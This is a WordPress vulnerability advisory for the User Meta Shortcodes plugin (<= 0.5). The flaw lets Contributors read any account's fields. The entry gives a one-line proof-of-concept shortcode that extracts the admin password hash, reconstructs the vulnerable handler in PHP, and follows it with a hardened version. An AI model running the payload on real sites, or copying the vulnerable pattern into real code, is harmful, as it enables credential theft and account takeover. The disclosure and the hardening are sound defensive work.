wpvulndb | Francesco Carlucci | WPVDB-ID: 958F44A5-07E7-4349-9212-2A039A082BA0
History: Nov 15, 2021 - 12:00 a.m.

User Meta Shortcodes <= 0.5 - Contributor+ Unauthorized Arbitrary User Metadata Access

2021-11-15 00:00:00
Francesco Carlucci
wpscan.com
8

EPSS: 0.001 (Low), Percentile: 24.8%

The plugin registers a shortcode that lets any user with a role as low as Contributor read another user's account data and metadata by passing the target's login and a field name as shortcode attributes. There is no capability check and no allow-list of fields, so the shortcode exposes sensitive fields such as the password hash (user_pass) and can be used to exfiltrate data from the WordPress instance.

PoC

As a contributor, put the following shortcode in a post/page: [otheruserinfo login="admin" field="user_pass"][/otheruserinfo]. A Contributor cannot publish, but previewing the draft renders the shortcode, so the password hash is disclosed without the post ever going live.
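The pattern behind this class of bug, and one way to harden it, as an added example. This is not the plugin's code: the shortcode tag and attribute names are taken from the PoC above, the function names are assumed, and the vulnerable handler is an illustrative reconstruction of the behaviour the advisory describes. The hardened handler restricts fields to an allow-list and authorises against the post author rather than the viewer, since a shortcode is rendered for every visitor and the relevant principal is whoever embedded it.

```php
<?php
/**
 * Added example, not the plugin's own code. Shortcode tag and attributes
 * ([otheruserinfo login="..." field="..."]) follow the advisory's PoC;
 * function names are assumed for illustration.
 */

// VULNERABLE pattern (illustrative reconstruction): any user who can add
// a post or page can embed the shortcode, and on render it reads any field
// of any account. No capability check, no field allow-list.
function vuln_otheruserinfo_shortcode( $atts ) {
    $atts = shortcode_atts( array( 'login' => '', 'field' => '' ), $atts, 'otheruserinfo' );
    $user = get_user_by( 'login', $atts['login'] );
    if ( ! $user ) {
        return '';
    }
    // WP_User::get() returns user-table columns (user_pass, user_email,
    // user_activation_key, ...) and falls back to user meta, so meta keys
    // such as session_tokens are reachable as well.
    return esc_html( (string) $user->get( $atts['field'] ) );
}

// HARDENED version (added example).
function hardened_otheruserinfo_shortcode( $atts ) {
    $atts = shortcode_atts( array( 'login' => '', 'field' => '' ), $atts, 'otheruserinfo' );

    // 1. Allow-list of public profile fields only. Sensitive columns and
    //    arbitrary meta keys are never reachable regardless of who asks.
    $allowed = array( 'display_name', 'description', 'user_url' );
    if ( ! in_array( $atts['field'], $allowed, true ) ) {
        return '';
    }

    $target = get_user_by( 'login', $atts['login'] );
    $post   = get_post(); // post currently being rendered; null outside the loop
    if ( ! $target || ! $post ) {
        return '';
    }

    // 2. Authorise against the post author, not the viewer. Authors may
    //    expose their own profile; exposing someone else's requires the
    //    edit_users capability, which Contributors (and Authors/Editors on
    //    a default install) do not have.
    $author_id = (int) $post->post_author;
    $is_self   = ( $author_id === (int) $target->ID );
    if ( ! $is_self && ! user_can( $author_id, 'edit_users' ) ) {
        return '';
    }

    return esc_html( (string) $target->get( $atts['field'] ) );
}

add_shortcode( 'otheruserinfo', 'hardened_otheruserinfo_shortcode' );
```

Either layer alone closes the PoC; keeping both means a future addition to the allow-list cannot silently turn into a cross-user disclosure. Note that the target of the capability check is the post author's ID stored in post_author, because the rendering context's current user is whoever is viewing the page, including anonymous visitors.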

CPE Name: user-meta-shortcodes | Operator: eq | Version: *
